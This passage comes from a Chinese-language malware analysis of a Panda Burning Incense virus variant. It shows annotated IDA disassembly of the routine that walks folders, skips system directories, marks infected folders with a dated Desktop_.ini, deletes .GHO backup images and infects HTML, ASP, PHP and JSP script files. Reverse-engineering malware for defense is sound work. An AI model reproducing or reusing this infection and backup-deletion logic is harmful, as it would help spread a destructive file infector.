pFileName]CODE:004093BFcallupcaseCODE:004093C4movedx,[ebp+var_1A0]CODE:004093CApopeaxCODE:004093CBcall@System@@LStrCmp$qqrvCODE:004093D0jzFnd_Next_FileCODE:004093D6leaedx,[ebp+var_1A4]CODE:004093DCmoveax,offsetaRecycled_0"Recycled"CODE:004093E1callupcaseCODE:004093E6moveax,[ebp+var_1A4]CODE:004093ECpusheaxCODE:004093EDleaedx,[ebp+var_1A8]CODE:004093F3moveax,[ebp+FNDDATA.
pFileName]CODE:004093F9callupcaseCODE:004093FEmovedx,[ebp+var_1A8]CODE:00409404popeaxCODE:00409405call@System@@LStrCmp$qqrvCODE:0040940AjzFnd_Next_FileCODE:00409410leaedx,[ebp+var_1AC]CODE:00409416moveax,offsetaWindowsNt"WindowsNT"CODE:0040941BcallupcaseCODE:00409420moveax,[ebp+var_1AC]CODE:00409426pusheaxCODE:00409427leaedx,[ebp+var_1B0]CODE:0040942Dmoveax,[ebp+FNDDATA.
pFileName]CODE:00409433callupcaseCODE:00409438movedx,[ebp+var_1B0]CODE:0040943EpopeaxCODE:0040943Fcall@System@@LStrCmp$qqrvCODE:00409444jzFnd_Next_FileCODE:0040944Aleaedx,[ebp+var_1B4]CODE:00409450moveax,offsetaWindowsupdat_0"WindowsUpdate"CODE:00409455callupcaseCODE:0040945Amoveax,[ebp+var_1B4]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net十九CODE:00409460pusheaxCODE:00409461leaedx,[ebp+var_1B8]CODE:00409467moveax,[ebp+FNDDATA.
pFileName]CODE:0040946DcallupcaseCODE:00409472movedx,[ebp+var_1B8]CODE:00409478popeaxCODE:00409479call@System@@LStrCmp$qqrvCODE:0040947EjzFnd_Next_FileCODE:00409484leaedx,[ebp+var_1BC]CODE:0040948Amoveax,offsetaWindowsMedia_0"WindowsMediaPlayer"CODE:0040948FcallupcaseCODE:00409494moveax,[ebp+var_1BC]CODE:0040949ApusheaxCODE:0040949Bleaedx,[ebp+var_1C0]CODE:004094A1moveax,[ebp+FNDDATA.
pFileName]CODE:004094A7callupcaseCODE:004094ACmovedx,[ebp+var_1C0]CODE:004094B2popeaxCODE:004094B3call@System@@LStrCmp$qqrvCODE:004094B8jzFnd_Next_FileCODE:004094BEleaedx,[ebp+var_1C4]CODE:004094C4moveax,offsetaOutlookExpre_0"OutlookExpress"CODE:004094C9callupcaseCODE:004094CEmoveax,[ebp+var_1C4]CODE:004094D4pusheaxCODE:004094D5leaedx,[ebp+var_1C8]CODE:004094DBmoveax,[ebp+FNDDATA.
pFileName]CODE:004094E1callupcaseCODE:004094E6movedx,[ebp+var_1C8]CODE:004094ECpopeaxCODE:004094EDcall@System@@LStrCmp$qqrvCODE:004094F2jzFnd_Next_FileCODE:004094F8leaedx,[ebp+var_1CC]CODE:004094FEmoveax,offsetaInternetExpl_0"InternetExplorer"CODE:00409503callupcaseCODE:00409508moveax,[ebp+var_1CC]CODE:0040950EpusheaxCODE:0040950Fleaedx,[ebp+var_1D0]CODE:00409515moveax,[ebp+FNDDATA.
pFileName]CODE:0040951BcallupcaseCODE:00409520movedx,[ebp+var_1D0]CODE:00409526popeax熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net二十CODE:00409527call@System@@LStrCmp$qqrvCODE:0040952CjzFnd_Next_FileCODE:00409532leaedx,[ebp+var_1D4]CODE:00409538moveax,offsetaNetmeeting_0"NetMeeting"CODE:0040953DcallupcaseCODE:00409542moveax,[ebp+var_1D4]CODE:00409548pusheaxCODE:00409549leaedx,[ebp+var_1D8]CODE:0040954Fmoveax,[ebp+FNDDATA.
pFileName]CODE:00409555callupcaseCODE:0040955Amovedx,[ebp+var_1D8]CODE:00409560popeaxCODE:00409561call@System@@LStrCmp$qqrvCODE:00409566jzFnd_Next_FileCODE:0040956Cleaedx,[ebp+var_1DC]CODE:00409572moveax,offsetaCommonFiles"CommonFiles"CODE:00409577callupcaseCODE:0040957Cmoveax,[ebp+var_1DC]CODE:00409582pusheaxCODE:00409583leaedx,[ebp+var_1E0]CODE:00409589moveax,[ebp+FNDDATA.
pFileName]CODE:0040958FcallupcaseCODE:00409594movedx,[ebp+var_1E0]CODE:0040959ApopeaxCODE:0040959Bcall@System@@LStrCmp$qqrvCODE:004095A0jzFnd_Next_FileCODE:004095A6leaedx,[ebp+var_1E4]CODE:004095ACmoveax,offsetaComplusAppli_0"ComPlusApplications"CODE:004095B1callupcaseCODE:004095B6moveax,[ebp+var_1E4]CODE:004095BCpusheaxCODE:004095BDleaedx,[ebp+var_1E8]CODE:004095C3moveax,[ebp+FNDDATA.
pFileName]CODE:004095C9callupcaseCODE:004095CEmovedx,[ebp+var_1E8]CODE:004095D4popeaxCODE:004095D5call@System@@LStrCmp$qqrvCODE:004095DAjzFnd_Next_FileCODE:004095E0leaedx,[ebp+var_1EC]CODE:004095E6moveax,offsetaCommonFiles"CommonFiles"CODE:004095EBcallupcaseCODE:004095F0moveax,[ebp+var_1EC]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net二十一CODE:004095F6pusheaxCODE:004095F7leaedx,[ebp+var_1F0]CODE:004095FDmoveax,[ebp+FNDDATA.
pFileName]CODE:00409603callupcaseCODE:00409608movedx,[ebp+var_1F0]CODE:0040960EpopeaxCODE:0040960Fcall@System@@LStrCmp$qqrvCODE:00409614jzFnd_Next_FileCODE:0040961Aleaedx,[ebp+var_1F4]CODE:00409620moveax,offsetaMessenger_0"Messenger"CODE:00409625callupcaseCODE:0040962Amoveax,[ebp+var_1F4]CODE:00409630pusheaxCODE:00409631leaedx,[ebp+var_1F8]CODE:00409637moveax,[ebp+FNDDATA.
pFileName]CODE:0040963DcallupcaseCODE:00409642movedx,[ebp+var_1F8]CODE:00409648popeaxCODE:00409649call@System@@LStrCmp$qqrvCODE:0040964EjzFnd_Next_FileCODE:00409654leaedx,[ebp+var_1FC]CODE:0040965Amoveax,offsetaInstallshiel_0"InstallShieldInstallationInformation"CODE:0040965FcallupcaseCODE:00409664moveax,[ebp+var_1FC]CODE:0040966ApusheaxCODE:0040966Bleaedx,[ebp+var_200]CODE:00409671moveax,[ebp+FNDDATA.
pFileName]CODE:00409677callupcaseCODE:0040967Cmovedx,[ebp+var_200]CODE:00409682popeaxCODE:00409683call@System@@LStrCmp$qqrvCODE:00409688jzFnd_Next_FileCODE:0040968Eleaedx,[ebp+var_204]CODE:00409694moveax,offsetaMsn"MSN"CODE:00409699callupcaseCODE:0040969Emoveax,[ebp+var_204]CODE:004096A4pusheaxCODE:004096A5leaedx,[ebp+var_208]CODE:004096ABmoveax,[ebp+FNDDATA.
pFileName]CODE:004096B1callupcaseCODE:004096B6movedx,[ebp+var_208]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net二十二CODE:004096BCpopeaxCODE:004096BDcall@System@@LStrCmp$qqrvCODE:004096C2jzFnd_Next_FileCODE:004096C8leaedx,[ebp+var_20C]CODE:004096CEmoveax,offsetaMicrosoftFro_0"MicrosoftFrontpage"CODE:004096D3callupcaseCODE:004096D8moveax,[ebp+var_20C]CODE:004096DEpusheaxCODE:004096DFleaedx,[ebp+var_210]CODE:004096E5moveax,[ebp+FNDDATA.
pFileName]CODE:004096EBcallupcaseCODE:004096F0movedx,[ebp+var_210]CODE:004096F6popeaxCODE:004096F7call@System@@LStrCmp$qqrvCODE:004096FCjzFnd_Next_FileCODE:00409702leaedx,[ebp+var_214]CODE:00409708moveax,offsetaMovieMaker"MovieMaker"CODE:0040970DcallupcaseCODE:00409712moveax,[ebp+var_214]CODE:00409718pusheaxCODE:00409719leaedx,[ebp+var_218]CODE:0040971Fmoveax,[ebp+FNDDATA.
pFileName]CODE:00409725callupcaseCODE:0040972Amovedx,[ebp+var_218]CODE:00409730popeaxCODE:00409731call@System@@LStrCmp$qqrvCODE:00409736jzFnd_Next_FileCODE:0040973Cleaedx,[ebp+var_21C]CODE:00409742moveax,offsetaMsnGaminZone"MSNGaminZone"CODE:00409747callupcaseCODE:0040974Cmoveax,[ebp+var_21C]CODE:00409752pusheaxCODE:00409753leaedx,[ebp+var_220]CODE:00409759moveax,[ebp+FNDDATA.
pFileName]CODE:0040975FcallupcaseCODE:00409764movedx,[ebp+var_220]CODE:0040976ApopeaxCODE:0040976Bcall@System@@LStrCmp$qqrvCODE:00409770jzFnd_Next_FileCODE:00409770[000004C2BYTES:ENDOFAREACmpisthatspdir.
PRESSKEYPAD""TOCOLLAPSE]CODE:00409776push[ebp+szFolderName]不是特殊文件夹则跳来这熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net二十三里CODE:00409779push[ebp+FNDDATA.
pFileName]CODE:0040977FpushoffsetaDesktop__ini_0"\\Desktop_.
ini"CODE:00409784leaeax,[ebp+var_224]CODE:0040978Amovedx,3CODE:0040978Fcall@System@@LStrCatN$qqrvCODE:00409794moveax,[ebp+var_224]CODE:0040979Acall@Sysutils@FileExists$qqrx17System@AnsiStringCODE:0040979Ftestal,alCODE:004097A1jzDeskTopFileNotExistWay如果desktop_.
ini文件不存在则跳CODE:004097A7push[ebp+szFolderName]CODE:004097AApush[ebp+FNDDATA.
pFileName]CODE:004097B0pushoffsetaDesktop__ini_0"\\Desktop_.
ini"CODE:004097B5leaeax,[ebp+var_228]CODE:004097BBmovedx,3CODE:004097C0call@System@@LStrCatN$qqrvCODE:004097C5moveax,[ebp+var_228]CODE:004097CBleaedx,[ebp+var_8]CODE:004097CEcallReadFileToMemCODE:004097D3leaeax,[ebp+SystemTime]CODE:004097D9pusheaxlpSystemTimeCODE:004097DAcallGetLocalTimeCODE:004097DFleaedx,[ebp+var_22C]CODE:004097E5movzxeax,[ebp+SystemTime.
wYear]CODE:004097ECcallsub_40587CCODE:004097F1push[ebp+var_22C]CODE:004097F7pushoffsetasc_40A0F4""CODE:004097FCleaedx,[ebp+var_230]CODE:00409802movzxeax,[ebp+SystemTime.
wMonth]CODE:00409809callsub_40587CCODE:0040980Epush[ebp+var_230]CODE:00409814pushoffsetasc_40A0F4""CODE:00409819leaedx,[ebp+var_234]CODE:0040981Fmovzxeax,[ebp+SystemTime.
wDay]CODE:00409826callsub_40587CCODE:0040982Bpush[ebp+var_234]CODE:00409831leaeax,[ebp+var_C]CODE:00409834movedx,5CODE:00409839call@System@@LStrCatN$qqrvCODE:0040983Emoveax,[ebp+var_8]CODE:00409841movedx,[ebp+var_C]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net二十四CODE:00409844call@System@@LStrCmp$qqrvCODE:00409849jnzshortReWrite_File如果文件内的内容等于当前日期则CODE:00409849病毒认为该文件夹已经感染过.
CODE:0040984Bpush[ebp+szFolderName]CODE:0040984Epush[ebp+FNDDATA.
pFileName]CODE:00409854pushoffsetasc_40A100"感染过,跳过!
"CODE:00409859leaeax,[ebp+var_238]CODE:0040985Fmovedx,3CODE:00409864call@System@@LStrCatN$qqrvCODE:00409869moveax,[ebp+var_238]CODE:0040986Fmovedx,offsetaCTest_txt"c:\\test.
txt"CODE:00409874call@Mxdsql@ShowSQLWindow$qqr17System@AnsiStringt1CODE:00409879leaeax,[ebp+var_23C]CODE:0040987Fmovecx,[ebp+FNDDATA.
pFileName]CODE:00409885movedx,[ebp+szFolderName]CODE:00409888call@System@@LStrCat3$qqrvCODE:0040988Dmoveax,[ebp+var_23C]CODE:00409893callScan_FoldersCODE:00409898jmpFnd_Next_FileCODE:0040989DCODE:0040989DCODE:0040989DReWrite_File:CODEXREF:Infect_Path+651jInfect_Path+651jCODE:0040989DpushFILE_ATTRIBUTE_NORMAL文件内容不为当前日期时病毒重写该文件内容为当前日期CODE:004098A2push[ebp+szFolderName]CODE:004098A5push[ebp+FNDDATA.
pFileName]CODE:004098ABpushoffsetaDesktop__ini_0dwFileAttributesCODE:004098B0leaeax,[ebp+var_240]CODE:004098B6movedx,3CODE:004098BBcall@System@@LStrCatN$qqrvCODE:004098C0moveax,[ebp+var_240]CODE:004098C6call@System@@LStrToPChar$qqrx17System@AnsiStringCODE:004098CBpusheaxlpFileNameCODE:004098CCcallSetFileAttributesACODE:004098D1push1dwMillisecondsCODE:004098D3callSleepCODE:004098D8leaeax,[ebp+SystemTime]CODE:004098DEpusheaxlpSystemTimeCODE:004098DFcallGetLocalTime熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net二十五CODE:004098E4leaedx,[ebp+var_244]CODE:004098EAmovzxeax,[ebp+SystemTime.
wYear]CODE:004098F1callsub_40587CCODE:004098F6push[ebp+var_244]CODE:004098FCpushoffsetasc_40A0F4""CODE:00409901leaedx,[ebp+var_248]CODE:00409907movzxeax,[ebp+SystemTime.
wMonth]CODE:0040990Ecallsub_40587CCODE:00409913push[ebp+var_248]CODE:00409919pushoffsetasc_40A0F4""CODE:0040991Eleaedx,[ebp+var_24C]CODE:00409924movzxeax,[ebp+SystemTime.
wDay]CODE:0040992Bcallsub_40587CCODE:00409930push[ebp+var_24C]CODE:00409936leaeax,[ebp+var_C]CODE:00409939movedx,5CODE:0040993Ecall@System@@LStrCatN$qqrvCODE:00409943push[ebp+szFolderName]CODE:00409946push[ebp+FNDDATA.
pFileName]CODE:0040994CpushoffsetaDesktop__ini_0"\\Desktop_.
ini"CODE:00409951leaeax,[ebp+var_250]CODE:00409957movedx,3CODE:0040995Ccall@System@@LStrCatN$qqrvCODE:00409961movedx,[ebp+var_250]CODE:00409967moveax,[ebp+var_C]CODE:0040996Acall@Mxdsql@ShowSQLWindow$qqr17System@AnsiStringt1_0CODE:0040996Fmovedx,offsetaCTest_txt"c:\\test.
txt"CODE:00409974moveax,offsetaFIV"时间不对,建立一个!
"CODE:00409979call@Mxdsql@ShowSQLWindow$qqr17System@AnsiStringt1CODE:0040997Epush7CODE:00409980push[ebp+szFolderName]CODE:00409983push[ebp+FNDDATA.
pFileName]CODE:00409989pushoffsetaDesktop__ini_0dwFileAttributesCODE:0040998Eleaeax,[ebp+var_254]CODE:00409994movedx,3CODE:00409999call@System@@LStrCatN$qqrvCODE:0040999Emoveax,[ebp+var_254]CODE:004099A4call@System@@LStrToPChar$qqrx17System@AnsiStringCODE:004099A9pusheaxlpFileNameCODE:004099AAcallSetFileAttributesACODE:004099AFpush1dwMilliseconds熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net二十六CODE:004099B1callSleepCODE:004099B6jmploc_409AF3CODE:004099BBCODE:004099BBCODE:004099BBDeskTopFileNotExistWay:CODEXREF:Infect_Path+5A9jInfect_Path+5A9jCODE:004099BBpush80hCODE:004099C0push[ebp+szFolderName]CODE:004099C3push[ebp+FNDDATA.
pFileName]CODE:004099C9pushoffsetaDesktop__ini_0dwFileAttributesCODE:004099CEleaeax,[ebp+var_258]CODE:004099D4movedx,3CODE:004099D9call@System@@LStrCatN$qqrvCODE:004099DEmoveax,[ebp+var_258]CODE:004099E4call@System@@LStrToPChar$qqrx17System@AnsiStringCODE:004099E9pusheaxlpFileNameCODE:004099EAcallSetFileAttributesACODE:004099EFpush1dwMillisecondsCODE:004099F1callSleepCODE:004099F6leaeax,[ebp+SystemTime]CODE:004099FCpusheaxlpSystemTimeCODE:004099FDcallGetLocalTimeCODE:00409A02leaedx,[ebp+var_25C]CODE:00409A08movzxeax,[ebp+SystemTime.
wYear]CODE:00409A0Fcallsub_40587CCODE:00409A14push[ebp+var_25C]CODE:00409A1Apushoffsetasc_40A0F4""CODE:00409A1Fleaedx,[ebp+var_260]CODE:00409A25movzxeax,[ebp+SystemTime.
wMonth]CODE:00409A2Ccallsub_40587CCODE:00409A31push[ebp+var_260]CODE:00409A37pushoffsetasc_40A0F4""CODE:00409A3Cleaedx,[ebp+var_264]CODE:00409A42movzxeax,[ebp+SystemTime.
wDay]CODE:00409A49callsub_40587CCODE:00409A4Epush[ebp+var_264]CODE:00409A54leaeax,[ebp+var_C]CODE:00409A57movedx,5CODE:00409A5Ccall@System@@LStrCatN$qqrvCODE:00409A61push[ebp+szFolderName]CODE:00409A64push[ebp+FNDDATA.
pFileName]CODE:00409A6ApushoffsetaDesktop__ini_0"\\Desktop_.
ini"熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net二十七CODE:00409A6Fleaeax,[ebp+var_268]CODE:00409A75movedx,3CODE:00409A7Acall@System@@LStrCatN$qqrvCODE:00409A7Fmovedx,[ebp+var_268]CODE:00409A85moveax,[ebp+var_C]CODE:00409A88call@Mxdsql@ShowSQLWindow$qqr17System@AnsiStringt1_0CODE:00409A8Dpush[ebp+szFolderName]CODE:00409A90push[ebp+FNDDATA.
pFileName]CODE:00409A96pushoffsetaDesktop__iniIV"\\Desktop_.
ini没有找到,建立一个!
"CODE:00409A9Bleaeax,[ebp+var_26C]CODE:00409AA1movedx,3CODE:00409AA6call@System@@LStrCatN$qqrvCODE:00409AABmoveax,[ebp+var_26C]CODE:00409AB1movedx,offsetaCTest_txt"c:\\test.
txt"CODE:00409AB6call@Mxdsql@ShowSQLWindow$qqr17System@AnsiStringt1CODE:00409ABBpush7CODE:00409ABDpush[ebp+szFolderName]CODE:00409AC0push[ebp+FNDDATA.
pFileName]CODE:00409AC6pushoffsetaDesktop__ini_0dwFileAttributesCODE:00409ACBleaeax,[ebp+var_270]CODE:00409AD1movedx,3CODE:00409AD6call@System@@LStrCatN$qqrvCODE:00409ADBmoveax,[ebp+var_270]CODE:00409AE1call@System@@LStrToPChar$qqrx17System@AnsiStringCODE:00409AE6pusheaxlpFileNameCODE:00409AE7callSetFileAttributesACODE:00409AECpush1dwMillisecondsCODE:00409AEEcallSleepCODE:00409AF3CODE:00409AF3loc_409AF3:CODEXREF:Infect_Path+7BEjInfect_Path+7BEjCODE:00409AF3leaeax,[ebp+var_274]CODE:00409AF9movecx,[ebp+FNDDATA.
pFileName]CODE:00409AFFmovedx,[ebp+szFolderName]CODE:00409B02call@System@@LStrCat3$qqrvCODE:00409B07moveax,[ebp+var_274]CODE:00409B0DcallInfect_PathCODE:00409B12jmpFndNextFileCODE:00409B17CODE:00409B17熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net二十八CODE:00409B17IsFileWay:CODEXREF:Infect_Path+A7jInfect_Path+A7jCODE:00409B17Infect_Path+B6jInfect_Path+B6jCODE:00409B17moveax,[ebp+FNDDATA.
pFileName]CODE:00409B1Dcmpbyteptr[eax],'.
'CODE:00409B20jzFndNextFile如果是文件名为".
"则跳去查找下一文件CODE:00409B26leaedx,[ebp+var_27C]CODE:00409B2Cmoveax,[ebp+FNDDATA.
pFileName]CODE:00409B32callGetExtName获取程序扩展名CODE:00409B37moveax,[ebp+var_27C]CODE:00409B3Dleaedx,[ebp+var_278]CODE:00409B43callUPCASECODE:00409B48moveax,[ebp+var_278]CODE:00409B4Emovedx,offsetaGho"GHO"CODE:00409B53call@System@@LStrCmp$qqrv这里危害比较大,可能导致中毒后只能重装系统CODE:00409B58jnzshortNext_409B7FCODE:00409B5Aleaeax,[ebp+var_280]CODE:00409B60movecx,[ebp+FNDDATA.
pFileName]CODE:00409B66movedx,[ebp+szFolderName]CODE:00409B69call@System@@LStrCat3$qqrvCODE:00409B6Emoveax,[ebp+var_280]CODE:00409B74call@System@@LStrToPChar$qqrx17System@AnsiStringCODE:00409B79pusheaxlpFileNameCODE:00409B7AcallDeleteFileA如果是后缀名为GHO则删除该文件CODE:00409B7FCODE:00409B7FNext_409B7F:CODEXREF:Infect_Path+960jInfect_Path+960jCODE:00409B7Fleaeax,[ebp+szFullFileName]CODE:00409B85movecx,[ebp+FNDDATA.
pFileName]CODE:00409B8Bmovedx,[ebp+szFolderName]CODE:00409B8Ecall@System@@LStrCat3$qqrvCODE:00409B93moveax,[ebp+szFullFileName]CODE:00409B99callDelphi_GetFileSizeCODE:00409B9Ecmpeax,10485760CODE:00409BA3jgeFndNextFile如果文件大于10mb则不进行感染操作CODE:00409BA9leaedx,[ebp+var_288]CODE:00409BAFmoveax,offsetaSetup_exe"setup.
exe"CODE:00409BB4callupcase熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net二十九CODE:00409BB9moveax,[ebp+var_288]CODE:00409BBFpusheaxCODE:00409BC0leaedx,[ebp+var_28C]CODE:00409BC6moveax,[ebp+FNDDATA.
pFileName]CODE:00409BCCcallupcaseCODE:00409BD1movedx,[ebp+var_28C]CODE:00409BD7popeaxCODE:00409BD8call@System@@LStrCmp$qqrvCODE:00409BDDjzFnd_Next_File文件名为setup.
exe则跳去查找下一文件CODE:00409BE3leaedx,[ebp+var_294]CODE:00409BE9moveax,[ebp+FNDDATA.
pFileName]CODE:00409BEFcallGetExtNameCODE:00409BF4moveax,[ebp+var_294]CODE:00409BFAleaedx,[ebp+var_290]CODE:00409C00callupcaseCODE:00409C05moveax,[ebp+var_290]CODE:00409C0BpusheaxCODE:00409C0Cleaedx,[ebp+var_298]CODE:00409C12moveax,offsetaHtm"htm"CODE:00409C17callupcaseCODE:00409C1Cmovedx,[ebp+var_298]CODE:00409C22popeaxCODE:00409C23call@System@@LStrCmp$qqrvCODE:00409C28jnzshortloc_409C49CODE:00409C2Aleaeax,[ebp+var_29C]CODE:00409C30movecx,[ebp+FNDDATA.
pFileName]CODE:00409C36movedx,[ebp+szFolderName]CODE:00409C39call@System@@LStrCat3$qqrvCODE:00409C3Emoveax,[ebp+var_29C]CODE:00409C44callInfect_Script_File_Proc感染脚本文件CODE:00409C49CODE:00409C49loc_409C49:CODEXREF:Infect_Path+A30jInfect_Path+A30jCODE:00409C49leaedx,[ebp+var_2A4]CODE:00409C4Fmoveax,[ebp+FNDDATA.
pFileName]CODE:00409C55callGetExtNameCODE:00409C5Amoveax,[ebp+var_2A4]CODE:00409C60leaedx,[ebp+var_2A0]CODE:00409C66callupcaseCODE:00409C6Bmoveax,[ebp+var_2A0]CODE:00409C71pusheax熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net三十CODE:00409C72leaedx,[ebp+var_2A8]CODE:00409C78moveax,offsetaHtml"html"CODE:00409C7DcallupcaseCODE:00409C82movedx,[ebp+var_2A8]CODE:00409C88popeaxCODE:00409C89call@System@@LStrCmp$qqrvCODE:00409C8Ejnzshortloc_409CAFCODE:00409C90leaeax,[ebp+var_2AC]CODE:00409C96movecx,[ebp+FNDDATA.
pFileName]CODE:00409C9Cmovedx,[ebp+szFolderName]CODE:00409C9Fcall@System@@LStrCat3$qqrvCODE:00409CA4moveax,[ebp+var_2AC]CODE:00409CAAcallInfect_Script_File_ProcCODE:00409CAFCODE:00409CAFloc_409CAF:CODEXREF:Infect_Path+A96jInfect_Path+A96jCODE:00409CAFleaedx,[ebp+var_2B4]CODE:00409CB5moveax,[ebp+FNDDATA.
pFileName]CODE:00409CBBcallGetExtNameCODE:00409CC0moveax,[ebp+var_2B4]CODE:00409CC6leaedx,[ebp+var_2B0]CODE:00409CCCcallupcaseCODE:00409CD1moveax,[ebp+var_2B0]CODE:00409CD7pusheaxCODE:00409CD8leaedx,[ebp+var_2B8]CODE:00409CDEmoveax,offsetaAsp"asp"CODE:00409CE3callupcaseCODE:00409CE8movedx,[ebp+var_2B8]CODE:00409CEEpopeaxCODE:00409CEFcall@System@@LStrCmp$qqrvCODE:00409CF4jnzshortloc_409D15CODE:00409CF6leaeax,[ebp+var_2BC]CODE:00409CFCmovecx,[ebp+FNDDATA.
pFileName]CODE:00409D02movedx,[ebp+szFolderName]CODE:00409D05call@System@@LStrCat3$qqrvCODE:00409D0Amoveax,[ebp+var_2BC]CODE:00409D10callInfect_Script_File_ProcCODE:00409D15CODE:00409D15loc_409D15:CODEXREF:Infect_Path+AFCjInfect_Path+AFCjCODE:00409D15leaedx,[ebp+var_2C4]CODE:00409D1Bmoveax,[ebp+FNDDATA.
pFileName]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net三十一CODE:00409D21callGetExtNameCODE:00409D26moveax,[ebp+var_2C4]CODE:00409D2Cleaedx,[ebp+var_2C0]CODE:00409D32callupcaseCODE:00409D37moveax,[ebp+var_2C0]CODE:00409D3DpusheaxCODE:00409D3Eleaedx,[ebp+var_2C8]CODE:00409D44moveax,offsetaPhp"php"CODE:00409D49callupcaseCODE:00409D4Emovedx,[ebp+var_2C8]CODE:00409D54popeaxCODE:00409D55call@System@@LStrCmp$qqrvCODE:00409D5Ajnzshortloc_409D7BCODE:00409D5Cleaeax,[ebp+var_2CC]CODE:00409D62movecx,[ebp+FNDDATA.
pFileName]CODE:00409D68movedx,[ebp+szFolderName]CODE:00409D6Bcall@System@@LStrCat3$qqrvCODE:00409D70moveax,[ebp+var_2CC]CODE:00409D76callInfect_Script_File_ProcCODE:00409D7BCODE:00409D7Bloc_409D7B:CODEXREF:Infect_Path+B62jInfect_Path+B62jCODE:00409D7Bleaedx,[ebp+var_2D4]CODE:00409D81moveax,[ebp+FNDDATA.
pFileName]CODE:00409D87callGetExtNameCODE:00409D8Cmoveax,[ebp+var_2D4]CODE:00409D92leaedx,[ebp+var_2D0]CODE:00409D98callupcaseCODE:00409D9Dmoveax,[ebp+var_2D0]CODE:00409DA3pusheaxCODE:00409DA4leaedx,[ebp+var_2D8]CODE:00409DAAmoveax,offsetaJsp"jsp"CODE:00409DAFcallupcaseCODE:00409DB4movedx,[ebp+var_2D8]CODE:00409DBApopeaxCODE:00409DBBcall@System@@LStrCmp$qqrvCODE:00409DC0jnzshortloc_409DE1CODE:00409DC2leaeax,[ebp+var_2DC]CODE:00409DC8movecx,[ebp+FNDDATA.
pFileName]CODE:00409DCEmovedx,[ebp+szFolderName]CODE:00409DD1call@System@@LStrCat3$qqrvCODE:00409DD6moveax,[ebp+var_2DC]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net三十二CODE:00409DDCcallInfect_Script_File_ProcCODE:00409DE1CODE:00409DE1loc_409DE1:CODEXREF:Infect_Path+BC8jInfect_Path+BC8jCODE:00409DE1leaedx,[ebp+var_2E4]CODE:00409DE7moveax,[ebp+FNDDATA.
pFileName]CODE:00409DEDcallGetExtNameCODE:00409DF2moveax,[ebp+var_2E4]CODE:00409DF8leaedx,[ebp+var_2E0]CODE:00409DFEcallupcaseCODE:00409E03moveax,[ebp+var_2E0]CODE:00409E09pusheaxCODE:00409E0Aleaedx,[ebp+var_2E8]CODE:00409E10moveax,offsetaAspx"aspx"CODE:00409E15callupcaseCODE:00409E1Amovedx,[ebp+var_2E8]CODE:00409E20popeaxCODE:00409E21call@System@@LStrCmp$qqrvCODE:00409E26jnzshortFndNextFileCODE:00409E28leaeax,[ebp+var_2EC]CODE:00409E2Emovecx,[ebp+FNDDATA.
pFileName]CODE:00409E34movedx,[ebp+szFolderName]CODE:00409E37call@System@@LStrCat3$qqrvCODE:00409E3Cmoveax,[ebp+var_2EC]CODE:00409E42callInfect_Script_File_ProcCODE:00409E47CODE:00409E47FndNextFile:CODEXREF:Infect_Path+91AjInfect_Path+91AjCODE:00409E47Infect_Path+928jInfect_Path+928j.
.
.
CODE:00409E47push14hdwMillisecondsCODE:00409E49callSleepCODE:00409E4ECODE:00409E4EFnd_Next_File:CODEXREF:Infect_Path+F0jInfect_Path+F0jCODE:00409E4EInfect_Path+12AjInfect_Path+12Aj.
.
.
CODE:00409E4Eleaeax,[ebp+var_164]CODE:00409E54call@Sysutils@FindNext$qqrr19Sysutils@TSearchRecCODE:00409E59testeax,eaxCODE:00409E5BjzLoop_FndFileCODE:00409E61CODE:00409E61close_Fnd:CODEXREF:Infect_Path+95jInfect_Path+95j熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net三十三CODE:00409E61leaeax,[ebp+var_164]CODE:00409E67call@Sysutils@FindClose$qqrr19Sysutils@TSearchRecCODE:00409E6Cxoreax,eaxCODE:00409E6EpopedxCODE:00409E6FpopecxCODE:00409E70popecxCODE:00409E71movfs:[eax],edxCODE:00409E74jmpshortloc_409E80CODE:00409E76CODE:00409E76CODE:00409E76loc_409E76:DATAXREF:Infect_Path+40oInfect_Path+40oCODE:00409E76jmp@System@@HandleAnyException$qqrvCODE:00409E7BCODE:00409E7Bcall@System@@DoneExcept$qqrvCODE:00409E80CODE:00409E80loc_409E80:CODEXREF:Infect_Path+C7CjInfect_Path+C7CjCODE:00409E80xoreax,eaxCODE:00409E82popedxCODE:00409E83popecxCODE:00409E84popecxCODE:00409E85movfs:[eax],edxCODE:00409E88pushoffsetloc_409EC3CODE:00409E8DCODE:00409E8Dloc_409E8D:CODEXREF:j_@System@@HandleFinally$qqrv_22+5jj_@System@@HandleFinally$qqrv_22+5jCODE:00409E8Dleaeax,[ebp+var_2EC]CODE:00409E93movedx,5EhCODE:00409E98call@System@@LStrArrayClr$qqrpviCODE:00409E9Dleaeax,[ebp+var_164]CODE:00409EA3movedx,off_407720CODE:00409EA9call@System@@FinalizeRecord$qqrpvt1CODE:00409EAEleaeax,[ebp+var_C]CODE:00409EB1movedx,3CODE:00409EB6call@System@@LStrArrayClr$qqrpviCODE:00409EBBretnCODE:00409EBBInfect_Pathendpsp=20hCODE:00409EBB到这里感染本地文件部分就结束了,其中Infect_Script_File_Proc只是简单的添加信息,因此我就不贴了.
